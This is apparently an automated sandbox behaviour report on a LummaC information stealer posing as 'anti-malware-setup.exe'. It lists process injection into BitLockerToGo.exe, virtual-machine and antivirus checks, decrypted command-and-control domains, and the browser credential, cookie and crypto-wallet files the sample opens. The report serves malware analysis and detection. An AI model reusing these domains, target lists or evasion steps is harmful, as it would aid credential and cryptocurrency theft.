              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: anti-malware-setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: anti-malware-setup.exeStatic file information: File size 4063744 > 1048576
              Source: anti-malware-setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1cca00
              Source: anti-malware-setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1de800
              Source: anti-malware-setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
              Source: anti-malware-setup.exeStatic PE information: real checksum: 0x3e1529 should be: 0x3e6e0a
              Source: anti-malware-setup.exeStatic PE information: section name: .symtab
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043CDB0 push eax; mov dword ptr [esp], 01410170h3_2_0043CDB4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004457E7 push esp; iretd 3_2_004457E8
              Source: C:\Users\user\Desktop\anti-malware-setup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7120Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 892Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: BitLockerToGo.exe, 00000003.00000002.2455088061.000000000344D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454185919.000000000344D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: BitLockerToGo.exe, 00000003.00000003.2345945791.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2443343531.0000000003497000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: anti-malware-setup.exe, 00000000.00000002.2320548291.000000000164C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: BitLockerToGo.exe, 00000003.00000003.2345945791.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2443343531.0000000003497000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: BitLockerToGo.exe, 00000003.00000003.2371265179.0000000005B20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043B8A0 LdrInitializeThunk,3_2_0043B8A0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
              Source: anti-malware-setup.exe, 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: enterwahsh.biz
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 302D008Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43F000Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\anti-malware-setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2443343531.0000000003497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000003.00000003.2432562158.00000000034EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC
              Source: BitLockerToGo.exe, 00000003.00000003.2443567206.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000003.00000003.2443567206.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000003.00000002.2455088061.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wal
              Source: BitLockerToGo.exe, 00000003.00000003.2411487733.00000000034E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: BitLockerToGo.exe, 00000003.00000003.2411282821.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: BitLockerToGo.exe, 00000003.00000003.2443567206.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000003.00000003.2411487733.00000000034E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000003.00000002.2455088061.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z"
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
